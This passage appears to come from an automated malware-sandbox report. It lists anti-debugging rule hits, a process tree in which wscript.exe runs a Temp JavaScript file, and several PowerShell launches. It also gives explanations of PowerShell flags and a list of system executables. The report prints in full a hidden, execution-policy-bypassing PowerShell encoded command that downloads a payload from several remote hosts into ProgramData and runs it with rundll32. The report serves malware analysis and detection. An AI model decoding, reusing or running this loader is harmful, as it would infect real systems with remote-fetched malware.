BCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |